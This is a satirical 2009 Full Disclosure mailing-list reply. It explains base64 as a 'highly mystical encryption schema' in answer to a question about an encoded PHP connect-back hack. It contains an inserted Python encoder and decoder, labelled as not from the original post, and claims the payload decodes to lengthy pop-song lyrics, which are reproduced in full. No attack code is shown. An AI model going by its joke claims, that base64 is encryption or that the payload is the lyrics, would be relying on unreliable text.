Full Disclosure mailing list archives
Re: connect back PHP hack
From: Fredrick Diggle <fdiggle () gmail com>
Date: Thu, 12 Feb 2009 00:52:40 -0600
Fredrick Diggle Security has taken it upon itself to reverse this highly mystical encryption schema and has employed its crack cryptanalysis experts and reverse engineers, including the highly acclaimed Mustache, to get answers to your questions. The team has spent a restless 48 hours reverse engineering this schema and presents the following formal analysis to the cryptographic community at large.

1. High Level Overview

A 65-character subset of US-ASCII is used, enabling 6 bits to be represented per printable character. (The extra 65th character, "=", is used to signify a special processing function.)

The encoding process represents 24-bit groups of input bits as output strings of 4 encoded characters. Proceeding from left to right, a 24-bit input group is formed by concatenating 3 8-bit input groups. These 24 bits are then treated as 4 concatenated 6-bit groups, each of which is translated into a single digit in the encrypted alphabet.

Each 6-bit group is used as an index into an array of 64 printable characters. The character referenced by the index is placed in the output string.

Table 1: Alphabetic Substitution

    Value Encoding  Value Encoding  Value Encoding  Value Encoding
        0 A            17 R            34 i            51 z
        1 B            18 S            35 j            52 0
        2 C            19 T            36 k            53 1
        3 D            20 U            37 l            54 2
        4 E            21 V            38 m            55 3
        5 F            22 W            39 n            56 4
        6 G            23 X            40 o            57 5
        7 H            24 Y            41 p            58 6
        8 I            25 Z            42 q            59 7
        9 J            26 a            43 r            60 8
       10 K            27 b            44 s            61 9
       11 L            28 c            45 t            62 +
       12 M            29 d            46 u            63 /
       13 N            30 e            47 v
       14 O            31 f            48 w         (pad) =
       15 P            32 g            49 x
       16 Q            33 h            50 y

Special processing is performed if fewer than 24 bits are available at the end of the data being encoded. A full encoding quantum is always completed at the end of a quantity. When fewer than 24 input bits are available in an input group, zero bits are added (on the right) to form an integral number of 6-bit groups. Padding at the end of the data is performed using the '=' character.

Since all encrypted input is an integral number of octets, only the following cases can arise:

(1) The final quantum of encoding input is an integral multiple of 24 bits; here, the final unit of encoded output will be an integral multiple of 4 characters with no "=" padding.

(2) The final quantum of encoding input is exactly 8 bits; here, the final unit of encoded output will be two characters followed by two "=" padding characters.

(3) The final quantum of encoding input is exactly 16 bits; here, the final unit of encoded output will be three characters followed by one "=" padding character.

2. Illustrations and examples

To translate between binary and this encryption schema, the input is stored in a structure and the output is extracted. This relationship is displayed in the following figure.

    +--first octet--+-second octet--+--third octet--+
    |7 6 5 4 3 2 1 0|7 6 5 4 3 2 1 0|7 6 5 4 3 2 1 0|
    +-----------+---+-------+-------+---+-----------+
    |5 4 3 2 1 0|5 4 3 2 1 0|5 4 3 2 1 0|5 4 3 2 1 0|
    +--1.index--+--2.index--+--3.index--+--4.index--+

The following is an example of this schema in use.

    Input data:  0x14fb9c03d97e
    Hex:      1   4    f   b    9   c   |  0   3    d   9    7   e
    8-bit:    00010100 11111011 10011100 | 00000011 11011001 01111110
    6-bit:    000101 001111 101110 011100 | 000000 111101 100101 111110
    Decimal:  5      15     46     28     | 0      61     37     62
    Output:   F      P      u      c      | A      9      l      +

    Input data:  0x14fb9c03d9
    Hex:      1   4    f   b    9   c   |  0   3    d   9
    8-bit:    00010100 11111011 10011100 | 00000011 11011001   pad with 00
    6-bit:    000101 001111 101110 011100 | 000000 111101 100100
    Decimal:  5      15     46     28     | 0      61     36      pad with =
    Output:   F      P      u      c      | A      9      k      =

    Input data:  0x14fb9c03
    Hex:      1   4    f   b    9   c   |  0   3
    8-bit:    00010100 11111011 10011100 | 00000011   pad with 0000
    6-bit:    000101 001111 101110 011100 | 000000 110000
    Decimal:  5      15     46     28     | 0      48      pad with = =
    Output:   F      P      u      c      | A      w      =      =
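As an added example (not code from the original post), the encoder and decoder below implement Table 1, the 24-bit quantum and the three '=' padding cases from scratch, and check themselves against the three worked examples above. The decoder rejects misplaced padding and out-of-alphabet characters rather than silently guessing, which is the check you want before trusting a decoded blob.

```python
# Added example, not from the original post: the 64-character alphabet,
# 24-bit quantum and '=' padding rules described above, from scratch.
ALPHABET = ("ABCDEFGHIJKLMNOPQRSTUVWXYZ"
            "abcdefghijklmnopqrstuvwxyz"
            "0123456789+/")
PAD = "="
INDEX = {c: i for i, c in enumerate(ALPHABET)}   # Table 1, inverted

# The three worked examples from the post (hex input -> encoded output).
EXAMPLES = {"14fb9c03d97e": "FPucA9l+",
            "14fb9c03d9": "FPucA9k=",
            "14fb9c03": "FPucAw=="}

def encode(data: bytes) -> str:
    """Emit 4 chars per 24-bit group; a short final group is zero-filled, then padded."""
    out = []
    for i in range(0, len(data), 3):
        chunk = data[i:i + 3]
        n = len(chunk)
        bits = int.from_bytes(chunk + b"\x00" * (3 - n), "big")  # zero bits on the right
        quantum = [ALPHABET[(bits >> s) & 0x3F] for s in (18, 12, 6, 0)]
        # 3 octets -> 4 chars; 2 octets -> 3 chars + "="; 1 octet -> 2 chars + "==".
        keep = n + 1
        out.append("".join(quantum[:keep]) + PAD * (4 - keep))
    return "".join(out)

def decode(text: str) -> bytes:
    """Reverse encode(); raise ValueError on anything the rules above do not allow."""
    if len(text) % 4 or any(c not in INDEX and c != PAD for c in text):
        raise ValueError("length not a multiple of 4, or character outside Table 1")
    out = bytearray()
    for i in range(0, len(text), 4):
        quantum = text[i:i + 4]
        pad = quantum.count(PAD)
        # '=' is legal only as the last one or two characters of the final quantum.
        if pad > 2 or (pad and i + 4 != len(text)) or PAD in quantum.rstrip(PAD):
            raise ValueError("misplaced '=' padding")
        bits = 0
        for c in quantum.rstrip(PAD).ljust(4, ALPHABET[0]):  # 'A' is six zero bits
            bits = (bits << 6) | INDEX[c]
        out += bits.to_bytes(3, "big")[:3 - pad]  # drop the zero-fill octets
    return bytes(out)

def check_worked_examples() -> bool:
    """Round-trip every example in EXAMPLES through encode() and decode()."""
    return all(encode(bytes.fromhex(h)) == s and decode(s) == bytes.fromhex(h)
               for h, s in EXAMPLES.items())
```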
3. Conclusions

Given this analysis of the provided data it is clear that, when decrypted, the clear text of the encrypted string becomes:

"I've had a little bit too much, much
All of the people start to rush, start to rush by
A dizzy twisted dance, can't find my drink, oh man
Where are my keys? I lost my phone, phone
What's going on on the floor?
I love this record baby but I can't see straight anymore
Keep it cool, what's the name of this club?
I can't remember but it's alright, a-alright
Just dance, gonna be okay, da da doo-doo-mmm
Just dance, spin that record babe, da da doo-doo-mmm
Just dance, gonna be okay, d-d-d-dance
Dance, dance, just, j-j-just dance
Wish I could shut my playboy mouth, oh oh oh-oh
How'd I turn my shirt inside out? Inside outright
Control your poison babe, roses have thorns they say
And we're all getting hosed tonight, oh oh oh-oh
What's going on on the floor?
I love this record baby but I can't see straight anymore
Keep it cool, what's the name of this club?
I can't remember but it's alright, a-alright
Just dance, gonna be okay, da da doo-doo-mmm
Just dance, spin that record babe, da da doo-doo-mmm
Just dance, gonna be okay, d-d-d-dance
Dance, dance, just, j-j-just
When I come through on the dance floor checkin' out that catalog
Can't believe my eyes, so many women without a flaw
And I ain't gon' give it up, steady tryin' to pick it up like a car
I'ma hit it, I'ma hit it and flex and do it until tomorr' yeah
Shawty I can see that you got so much energy
The way you're twirlin' up them hips 'round and 'round
And now there's no reason at all why you can't leave here with me
In the meantime stay and let me watch you break it down
And dance, gonna be okay, da da doo-doo-mmm
Just dance, spin that record babe, da da doo-doo-mmm
Just dance, gonna be okay, da da doo-doo-mmm
Just dance, spin that record babe, da da doo-doo-mmm
Just dance, gonna be okay, d-d-d-dance
Dance, dance, just, j-j-just dance
Woo! Let's go!
Half psychotic, sick, hypnotic
Got my blueprint, it's symphonic
Half psychotic, sick, hypnotic
Got my blueprint electronic
Half psychotic, sick, hypnotic
Got my blueprint, it's symphonic
Half psychotic, sick, hypnotic
Got my blueprint electronic
Go! Use your muscle, carve it out, work it, hustle
I got it, just stay close enough to get it
Don't slow! Drive it, clean it, Lysol, bleed it
Spend the last dough (I got it)
In your pocko (I got it)
Just dance, gonna be okay, da da doo-doo-mmm
Just dance, spin that record babe, da da doo-doo-mmm
Just dance, gonna be okay, da da doo-doo-mmm
Just dance, spin that record babe, da da doo-doo-mmm
Just dance, gonna be okay, d-d-d-dance
Dance, dance, just, j-j-just dance"

(c)opyright Fredrick Diggle Security 2009

On Tue, Feb 10, 2009 at 12:23 PM, sr. <staticrez () gmail com> wrote:
can anyone tell me what encoding this is?

this has to do with old php 4.x.x version with magic quotes enabled. i'm just trying to figure out what the connect back code does. any input is much appreciated.

thx,
sr.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/